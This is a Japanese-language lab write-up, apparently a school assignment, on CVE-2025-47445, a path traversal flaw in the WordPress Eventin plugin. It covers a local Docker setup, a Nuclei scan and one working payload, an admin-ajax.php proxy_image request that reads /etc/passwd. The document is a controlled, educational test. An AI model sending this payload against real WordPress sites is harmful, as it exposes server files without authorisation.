
CVE-2025-47445の概念実証エクスプロイト。WordPress Eventinプラグインのパストラバーサル脆弱性です。ローカルDocker環境のセットアップ手順と手動による悪用手順を含みます。
この実証コードは、脆弱性のあるWordPressプラグインを見つけ、その脆弱性をローカルの管理された環境でテストすることを目的とした学校の課題に基づいています。
| 情報 | |
|---|---|
| WordPressプラグイン: | Wordpress Eventin |
| プラグインバージョン: | 4.0.26 (またはそれ以前) |
| CVE情報: | Project Discovery - Vulnerability library |
| CVEdetails.com | |
| 関連ツール: | Wordfence Lab Environment |
| Docker | |
| Burp Suite | |
| Nuclei |
Worfence Docker WordPress Research Labには2つの異なる環境が用意されており、1つは古いPHPバージョン、もう1つは新しいPHPバージョンです。新しい方を選択します。
# In the dockerwp84 folder
docker-compose build
docker-compose up -d
その後、localhost:1337 で WordPress ページをセットアップしました。プラグインストアから Eventin プラグイン(バージョン 4.0.26)をダウンロードし、WordPress インターフェースを通じてインストールおよび有効化しました。
これで準備は完了です。
Nuclei が探している CVE を見つけられるか確認したいので、一時的な Docker コンテナでインスタンスを実行します。
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337
Nuclei を数回実行してみましたが、結果が異なりました。理由はわかりません。しかし、最終的には CVE と、特に探していなかった他のいくつかの項目を見つけました。

/etc/passwd ファイルにアクセスできるか確認するため、以下のペイロードをGETリクエストに入力しました。
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd
そして成功しました。

これは教育目的で行われました。
すべてのソフトウェアを必ず更新してください。新しいCVEは毎日発見されています。